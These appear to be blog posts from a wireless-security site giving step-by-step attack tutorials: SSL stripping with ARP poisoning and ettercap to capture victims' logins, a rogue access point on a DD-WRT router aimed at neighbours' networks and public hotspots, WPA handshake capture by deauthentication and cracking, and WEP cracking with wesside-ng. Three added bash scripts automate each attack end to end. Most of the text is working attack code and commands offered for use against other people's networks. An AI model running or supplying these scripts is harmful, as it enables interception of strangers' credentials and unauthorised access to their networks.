
Fun With SSL Strip

One thing you have probably been taught, if you are tech-savvy, is to always use SSL whenever you can. You may be surprised to find out that it isn't quite as safe as you hoped. SSL Strip does not break SSL itself; it sits between the victim and the web and rewrites the HTTPS links and redirects in the pages it relays into plain HTTP, so the victim's logins, which they believe are encrypted, are submitted in clear text where we can read them. (If the victim types https:// by hand or follows a bookmarked https:// URL, there is nothing to strip.) To begin, we need a couple of things, at the very least a copy of BackTrack 4 beta and a copy of SSL Strip. For a more advanced attack, follow the MITM attack post before you begin.

Now that you have all of your tools collected and your attack vector established (either a MITM in place, or simply connected to a network with victims on it), extract the tarball you saved to /root by opening a shell and typing tar xvf sslstrip-0.7.tar.gz . Then cd into the directory this created (ls will show it). Once there, type kwrite to open the text editor, add the following lines and save the file as iptable.sh :

#!/bin/bash
# turn the box into a router, then hand every port 80 connection we forward to sslstrip on port 10000
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

After you save the file, close kwrite and type chmod 775 iptable.sh to make it executable. The first command turns on IP forwarding so your computer relays the victim's traffic like a router; the second redirects every TCP port 80 connection passing through it to local port 10000, which is where sslstrip listens by default. Now type ./iptable.sh and then ./sslstrip.py -k -w sslout.txt ; -k kills the victim's existing sessions so they have to log in again through us, and -w writes everything captured to a file called sslout.txt in the sslstrip folder. Now minimize the shell and let it run in the background.

How you pick the victim depends on how you started. If you did not follow the MITM attack and are just on a public network, you need to scan for victims. Open another shell and type ifconfig ath0 to see the IP address (inet addr) of your network card ath0; if you use wlan0, replace ath0 with wlan0 throughout. Now, to scan for computers, type nmap -sP [ipaddress]/24 where [ipaddress] is the network you are on (if you are 192.168.1.x, use 192.168.1.0). You can pick any address on the list except your own and x.x.x.1, which is usually the gateway or the router (or both); route -n will show you the real gateway if it is something else.

If, however, you used the MITM attack from the other post, log into the router's web page; you should land on the Sys-Info page, which is the default (if not, go to the Status tab and select the Sys-Info sub-tab). At the bottom of the page you will see a list of all active wireless clients with their MAC addresses, and below that a list of DHCP clients. Every client in the wireless list is active, so matching those MACs to the DHCP leases gives you your list of possible victims.

Once you have your victim selected, type arpspoof -i ath0 -t 192.168.1.101 192.168.1.1 if the victim is 192.168.1.101 and your network is 192.168.1.x, replacing the first three octets if you are on a different network (e.g. the gateway becomes 10.10.10.1 if your ath0 is 10.10.10.104). This tells the victim that the gateway's IP address lives at your MAC address, so its outbound traffic comes to you first. To make sure arpspoof worked, look at its output: each line should begin with two real MAC addresses (yours, then the victim's) followed by arp reply 192.168.1.1 is-at <your MAC>; a 0:0:0:0:0:0 in that line means it could not resolve the victim and nothing is being poisoned. If the lines look right, congratulations, you are now doing "ARP poisoning". Leave this shell running (minimized); when you are finished, stop it with Ctrl+C rather than killing it, so arpspoof can re-ARP the victim with the real gateway MAC.

Last but not least, we can watch the passwords as they come in. Open yet another shell (you should have three by now) and type ettercap -Tq -i ath0 -L sslstrip , which captures and displays in clear text every username and password that crosses ath0 (text mode, quiet, logging to files with the prefix sslstrip). Again, replace ath0 with wlan0 if that is your card. If everything is done correctly, you should see the username and password for any site the victim logs into; sslstrip's own sslout.txt holds the full POST data as a backup.
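The whole procedure above, as one script with the cleanup the post leaves out. This is an added example and not code from the original post: it assumes you run it as root on BackTrack 4 beta, that sslstrip.py is in the current directory, that arpspoof and ettercap are in $PATH, that ifconfig prints the old "inet addr:" format, and the SSLSTRIP_ATTACK variable and the helper names are mine.

```bash
#!/bin/bash
# Added example, not part of the original post: the sslstrip + arpspoof steps
# as one script that also cleans up after itself. Assumes root on BackTrack 4
# beta, sslstrip.py in the current directory, arpspoof/ettercap in $PATH, and
# ifconfig output in the pre-iproute2 "inet addr:" style.

# The /24 to hand nmap -sP, derived from your own address: 192.168.1.104 -> 192.168.1.0/24
net24() {
    case "$1" in
        *.*.*.*) printf '%s.0/24\n' "${1%.*}" ;;
        *) return 1 ;;
    esac
}

# The post's rule of thumb for the gateway: x.x.x.1 on your /24. It is only a
# convention; check `route -n` if arpspoof's traffic goes nowhere.
gateway_of() {
    printf '%s.1\n' "${1%.*}"
}

# arpspoof prints "<our mac> <victim mac> 0806 42: arp reply <gw> is-at <our mac>"
# once it has resolved the victim. A 0:0:0:0:0:0 in that line means it never did.
arpspoof_line_ok() {
    case "$1" in
        *0:0:0:0:0:0*) return 1 ;;
        *"arp reply"*) return 0 ;;
        *) return 1 ;;
    esac
}

# Address of an interface, so the script does not depend on reading ifconfig by eye.
iface_ip() {
    ifconfig "$1" 2>/dev/null | sed -n 's/.*inet addr:\([0-9.]*\).*/\1/p' | head -n 1
}

cleanup() {
    # Stop the tools, drop the NAT rule and turn forwarding back off. arpspoof
    # re-ARPs the victim with the real gateway MAC when it gets SIGINT/SIGTERM.
    kill "$ARPSPOOF_PID" "$SSLSTRIP_PID" 2>/dev/null
    iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 2>/dev/null
    echo 0 > /proc/sys/net/ipv4/ip_forward
}

main() {
    local iface="${1:-ath0}" victim="$2" gw="$3" me
    me=$(iface_ip "$iface")
    [ -n "$me" ] || { echo "no IPv4 address on $iface" >&2; return 1; }
    if [ -z "$victim" ]; then
        echo "usage: $0 IFACE VICTIM_IP [GATEWAY_IP]" >&2
        echo "find victims with: nmap -sP $(net24 "$me")" >&2
        return 1
    fi
    gw="${gw:-$(gateway_of "$me")}"

    trap cleanup EXIT INT TERM
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    ./sslstrip.py -k -w sslout.txt >/dev/null 2>&1 &
    SSLSTRIP_PID=$!
    # Poisoning only the victim's view of the gateway is enough: the stripped
    # HTTP sessions terminate at our proxy, and the gateway already knows the
    # victim's real MAC for everything else we forward.
    arpspoof -i "$iface" -t "$victim" "$gw" &
    ARPSPOOF_PID=$!
    # Foreground sniffer as in the post; Ctrl+C here tears everything down.
    ettercap -Tq -i "$iface" -L sslstrip
}

# Only act when explicitly asked, so the helpers can be sourced and checked safely.
if [ "${SSLSTRIP_ATTACK:-}" = "1" ]; then
    main "$@"
fi
```

Run it as SSLSTRIP_ATTACK=1 ./mitm.sh ath0 192.168.1.101 ; leave the gateway off to use the x.x.x.1 guess. Ctrl+C in the ettercap window triggers the cleanup trap, which is the part people forget and which leaves the victim without a gateway if skipped.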

There are a number of tutorials out there for this attack, all of which start after you have done a man-in-the-middle attack. But they never tell you how to MITM. The reason is that there are numerous ways to do it, and most of them require your own source of internet to complete the MITM and forward the traffic on to its proper destination.

Our method uses a modified router and an Eee PC 900 running BackTrack 4 beta to MITM. To begin, we need a router. We use a Linksys WRT600N, but it can just as easily be done with a Linksys WRT54G or any other router that supports the firmware we install, the DD-WRT v24 mega build. Once you install the new firmware from www.dd-wrt.org, the fun can begin.

Once the hardware is updated and ready to use, we find the victim network to MITM. To find a vulnerable network, we start by putting our wireless card into monitor mode: open a shell and type airmon-ng start wifi0 if you have an Atheros card, or iwconfig wlan0 mode monitor if you have an Intel card. If you are unsure what your wireless card is, open a shell and type iwconfig . Now that the card is in monitor mode, we scan by typing airodump-ng ath1 (the interface is given on its own at the end; if you used wlan0 in the previous step, replace ath1 with wlan0).

Now that you have found your target network (whichever network is unencrypted), configure your router for the attack. First put your card back into managed mode so you can talk to the router: in a shell type ifconfig ath1 down then ifconfig ath0 up (or iwconfig wlan0 mode managed if you have an Intel card), and finally NetworkManager start so that BT4 beta lets you connect to a wireless network.

With the DD-WRT router at its default settings, log in, go to the Setup tab, change the router's IP address to something other than the default (e.g. 192.168.3.1) and leave everything else alone. Then move to the Wireless tab. Under Basic Settings, add two virtual interfaces: a private one for you alone, with SSID broadcast disabled, and one with the same SSID as the victim network. Save your settings, then set the physical interface's mode to Repeater and set its SSID to the victim SSID as well. Apply the settings again and connect to your hidden access point.

Log back into the router, return to the Wireless tab and open Wireless Security. Be sure to add WPA encryption to your hidden network (the one only you will be on), apply the settings and reconnect to your AP. Finally, back on the Wireless tab, go to Advanced Settings, scroll down to TX Power and change the value to 251 to boost the power you are broadcasting at.

Now sit back for a second and breathe; all of the hard work is done. From any page of the router's web interface, look at the top right corner: if you have a WAN IP, your job is done. You are connected to the victim network, you are rebroadcasting its SSID from your router, and no matter how many users connect through your router, the victim network only ever sees one "user" (the router). It may seem like a lot of work at first, but from this point on all you need to do is change the SSID in the basic wireless settings to turn the router into a rogue AP for any network. This works on your neighbors, on any public hotspot, or on any network you can connect to; if the network uses a splash screen to gain access, it is still shown to every user who connects through you, which makes you nearly invisible. The same technique can also be used to extend the range of your own wireless network.

For this attack we need two things: BackTrack 4 beta and a WPA-encrypted network with at least one client on it (we need a client to deauthenticate). Additional tools that are not required but speed the attack up considerably are WPA rainbow tables (precomputed PMKs) for the top 1000 SSIDs, which will be hosted here shortly.

To begin, we must put our wireless card into monitor mode. Open a shell and type either airmon-ng start wifi0 for Atheros cards or iwconfig wlan0 mode monitor for Intel cards. Then we need to find the network we wish to attack by typing airodump-ng ath1 (ath1 is the monitor-mode interface airmon-ng created; use wlan0 if that is your card). Once the network shows up, stop the scan with Ctrl+C. Then type airodump-ng -c # --bssid XX:XX:XX:XX:XX:XX --showack -w capture ath1 where:

  • # = the channel number the network is on
  • XX:XX:XX:XX:XX:XX = the BSSID (MAC address) of the router

This locks airodump-ng onto the target's channel and BSSID and writes a capture file (capture-01.cap) that will hold the WPA four-way handshake, which is what we crack to recover the WPA key. Note that the interface goes last, on its own: with airodump-ng, -i means --ivs (save only IVs), which would leave the handshake out of the file. To get a handshake we must deauthenticate a user who is connected to the network so that it reconnects. To do so, open another shell and type aireplay-ng -0 0 -a XX:XX:XX:XX:XX:XX -c YY:YY:YY:YY:YY:YY ath1

where YY:YY:YY:YY:YY:YY is the MAC address of a client connected to the target network, as listed in the airodump shell. -0 0 sends deauthentication frames without end, so let the aireplay shell run only until airodump shows a handshake captured (top right corner of its screen), then stop it with Ctrl+C; a handful of frames is usually enough, and an endless deauth is very noticeable. To check that you have a complete handshake, open a third shell and type aircrack-ng capture-01.cap ; the target network should be listed as WPA (1 handshake).


Now that you have a captured handshake, you have multiple options for cracking:

  • Aircrack-ng with a password file
  • CoWPAtty if you have a rainbow table
  • Online Cracking Site ($$)

For aircrack-ng, open a shell and type aircrack-ng capture-01.cap -w dictionary.txt (add -e ssid if the capture holds more than one network).

The two dictionary files used for the hashes are:

To brute force the capture with aircrack-ng and John the Ripper, with John generating the candidates and piping them in, type ./john --stdout --incremental:all | aircrack-ng -e ssid -w - capture_file

For cowpatty, open a shell, type cd /pentest/wireless/cowpatty/ then ./cowpatty -r /root/capture-01.cap -s [ssid] -d [hashfile] where [ssid] is the network to crack and [hashfile] is the rainbow table for that SSID. The PMK is derived from the passphrase and the SSID, so a table only works for the exact SSID it was generated for.

Just remember, if time is of the essence, use cowpatty whenever you have a precomputed table for the SSID.
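The capture and crack steps above as one script, as an added example rather than code from the original post. It assumes aircrack-ng 1.0-era tools and the BackTrack 4 cowpatty path from the post (/pentest/wireless/cowpatty/), a monitor-mode interface named ath1 unless IFACE says otherwise, and root; the WPA_ATTACK variable, the function names and the sample aircrack-ng listing in the usage are mine. It deauthenticates in short bursts and re-checks for the handshake instead of running aireplay-ng -0 0 forever.

```bash
#!/bin/bash
# Added example, not part of the original post: WPA handshake capture and
# cracking as one script. Assumes BackTrack 4 paths (cowpatty in
# /pentest/wireless/cowpatty/), aircrack-ng 1.0-era tools, a monitor-mode
# interface (default ath1) and root.

# Extract the handshake count aircrack-ng reports for one BSSID from its
# network listing, e.g. "1  00:11:22:33:44:55  linksys  WPA (1 handshake)".
# Prints nothing if the BSSID is not in the listing at all.
handshake_count() {
    local listing="$1" bssid="$2"
    printf '%s\n' "$listing" | grep -i -- "$bssid" | sed -n 's/.*(\([0-9][0-9]*\) handshake).*/\1/p' | head -n 1
}

# True once the capture holds at least one four-way handshake for the target.
have_handshake() {
    local cap="$1" bssid="$2" n
    [ -s "$cap" ] || return 1
    n=$(handshake_count "$(aircrack-ng "$cap" 2>/dev/null </dev/null)" "$bssid")
    [ "${n:-0}" -ge 1 ]
}

# Decide how to crack: a cowpatty hash file for this SSID is fastest, otherwise
# fall back to aircrack-ng with a wordlist (the post's order of preference).
crack_command() {
    local cap="$1" ssid="$2" hashfile="$3" wordlist="$4"
    if [ -n "$hashfile" ] && [ -r "$hashfile" ]; then
        printf '/pentest/wireless/cowpatty/cowpatty -r %s -s %s -d %s\n' "$cap" "$ssid" "$hashfile"
    elif [ -n "$wordlist" ] && [ -r "$wordlist" ]; then
        printf 'aircrack-ng -e %s -w %s %s\n' "$ssid" "$wordlist" "$cap"
    else
        return 1
    fi
}

main() {
    local channel="$1" bssid="$2" client="$3" ssid="$4" hashfile="$5" wordlist="$6"
    local iface="${IFACE:-ath1}" prefix="capture" cap="capture-01.cap" tries=0 cmd
    [ -n "$ssid" ] || { echo "usage: $0 CHANNEL BSSID CLIENT_MAC SSID [HASHFILE] [WORDLIST]" >&2; return 1; }

    # Lock airodump-ng on the target channel and BSSID and write the capture.
    # The interface is a positional argument; -i would mean --ivs (IVs only)
    # and would drop the handshake from the file.
    airodump-ng -c "$channel" --bssid "$bssid" --showack -w "$prefix" "$iface" >/dev/null 2>&1 &
    DUMP_PID=$!
    trap 'kill $DUMP_PID 2>/dev/null' EXIT INT TERM
    sleep 5

    # Deauth in short bursts (-0 5) and re-check, instead of -0 0 forever:
    # one reconnect is all we need, and endless deauth is noisy.
    while ! have_handshake "$cap" "$bssid"; do
        tries=$((tries + 1))
        [ "$tries" -le 20 ] || { echo "no handshake after $tries bursts" >&2; return 1; }
        aireplay-ng -0 5 -a "$bssid" -c "$client" "$iface" >/dev/null 2>&1
        sleep 10
    done
    echo "handshake captured in $cap"

    cmd=$(crack_command "$cap" "$ssid" "$hashfile" "$wordlist") || { echo "no hash file or wordlist given" >&2; return 1; }
    echo "running: $cmd"
    $cmd
}

# Only run the attack when asked, so the helpers can be sourced and tested.
if [ "${WPA_ATTACK:-}" = "1" ]; then
    main "$@"
fi
```

Usage: WPA_ATTACK=1 ./wpa.sh 6 00:11:22:33:44:55 00:AA:BB:CC:DD:EE linksys /root/linksys.hash /root/dictionary.txt ; the hash file wins if it exists, the wordlist is the fallback, and with neither the script stops after the handshake is on disk so you can crack it elsewhere.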

*Update*

The WPA hashes have been uploaded, and can be found here

Before we begin: all tutorials are performed on an Eee PC 900 running BackTrack 4 beta.

To start, we must put our wireless card into monitor mode. To find out what your card is called, open a shell prompt and type iwconfig

[screenshot: iwconfig output]

In the list, the main card is wifi0 and the ath0 beneath it means it is an Atheros card (wifi0 is the madwifi device, ath0 the interface it exposes); if your list shows wlan0 instead, you will be just fine. Our next step is to put the card into monitor mode. To do that, we type
airmon-ng start wifi0

[screenshot: airmon-ng output, card in monitor mode]

If your card is wlan0, replace wifi0 with wlan0. As you can see, there is a new interface labeled ath1; ath1 is our card in monitor mode. Now we must find a network in range to crack, so we run Kismet by typing kismet

[screenshot: kismet]

If you get an error saying Kismet cannot find 'wlan0' because you have an Atheros card, edit the kismet.conf file, normally located in the /etc/kismet/ folder, and change the wlan0 on its source= line to ath1, your card in monitor mode.

After you find the wireless network you wish to crack in Kismet, hit the 's' key to sort the list of networks and then 'w' to sort by WEP; scroll down to the network you want and hit Enter to view its BSSID.

Now open a new shell prompt; we are going to start generating IVs with wesside-ng. We type wesside-ng -i ath1 -v [bssid of network]


With wesside-ng, -i ath1 is our monitor-mode card and -v is the victim's BSSID. The tool forces an association with the network, recovers enough keystream (via the fragmentation attack) to forge ARP requests, replays them to the AP so that it generates fresh IVs, and writes everything it captures to a file wep.cap in the directory you ran it from; it also tries aircrack-ng against that file on its own as the IVs accumulate. To check whether you already have enough IVs, open a third shell prompt and type aircrack-ng wep.cap ; if there are enough, it prints KEY FOUND! with the key, otherwise it tells you to try again once more IVs have been captured.


And thus we have cracked our wireless network.
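The kismet.conf fix and the wesside-ng / aircrack-ng loop above as one script. This is an added example, not code from the original post: it assumes the madwifi naming from the post (ath1 in monitor mode, overridable with IFACE), kismet.conf at /etc/kismet/kismet.conf with a source=driver,interface,name line, aircrack-ng's "KEY FOUND! [ .. ]" output format, and root; the WEP_ATTACK variable, the function names and the sample config and output lines used in the usage are mine.

```bash
#!/bin/bash
# Added example, not part of the original post: fix kismet's capture source,
# run wesside-ng, and poll aircrack-ng until the IVs are enough. Assumes the
# madwifi naming used in the post (ath1 in monitor mode), kismet.conf at
# /etc/kismet/kismet.conf, and root. Paths and names are assumptions.

# Point Kismet's capture source at the monitor interface. Only the
# "source=" line is touched (kismet.conf lists it as source=driver,interface,name)
# and a .bak copy is left next to the file. Returns 1 if the file is missing.
kismet_source_fix() {
    local conf="$1" old="$2" new="$3"
    [ -r "$conf" ] || return 1
    cp "$conf" "$conf.bak"
    sed "/^source=/s/,$old,/,$new,/" "$conf.bak" > "$conf"
}

# Pull the key out of aircrack-ng's "KEY FOUND! [ 1A:2B:3C:4D:5E ]" line as the
# bare hex string iwconfig expects, or return 1 if there is no key yet.
wep_key_from_aircrack() {
    local out="$1" key
    key=$(printf '%s\n' "$out" | sed -n 's/.*KEY FOUND! \[ *\([0-9A-Fa-f:]*\) *\].*/\1/p' | head -n 1)
    [ -n "$key" ] || return 1
    printf '%s\n' "$key" | tr -d ':'
}

main() {
    local bssid="$1" iface="${IFACE:-ath1}" key
    [ -n "$bssid" ] || { echo "usage: $0 BSSID" >&2; return 1; }

    kismet_source_fix /etc/kismet/kismet.conf wlan0 "$iface" \
        || echo "kismet.conf not updated (file not found?)" >&2

    # wesside-ng associates, recovers keystream, replays ARP to generate IVs,
    # and writes what it captures to wep.cap in the current directory.
    wesside-ng -i "$iface" -v "$bssid" >/dev/null 2>&1 &
    WS_PID=$!
    trap 'kill $WS_PID 2>/dev/null' EXIT INT TERM

    # Re-run aircrack-ng every 30 s until the IVs suffice; -b keeps it from
    # prompting when the capture holds more than one network.
    while sleep 30; do
        [ -s wep.cap ] || continue
        if key=$(wep_key_from_aircrack "$(aircrack-ng -b "$bssid" wep.cap 2>/dev/null </dev/null)"); then
            echo "WEP key: $key"
            echo "connect with: iwconfig $iface essid <ssid> key $key"
            return 0
        fi
    done
}

# Only run the attack when asked, so the helpers can be sourced and tested.
if [ "${WEP_ATTACK:-}" = "1" ]; then
    main "$@"
fi
```

Usage: WEP_ATTACK=1 ./wep.sh 00:11:22:33:44:55 from the directory you want wep.cap in. The key is printed without colons because that is the form iwconfig's key parameter takes.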

This is 802.11 loops, a site dedicated to educating people about the dangers and vulnerabilities that exist in the world of wireless networks of all kinds, from 802.11a/b/g/n to Bluetooth and even RFID.

Hopefully, with a collection of tools and knowledge, every person who visits here will take away something to protect themselves and those around them from wireless attacks of all sorts, and even test their own networks to find where they are insecure.
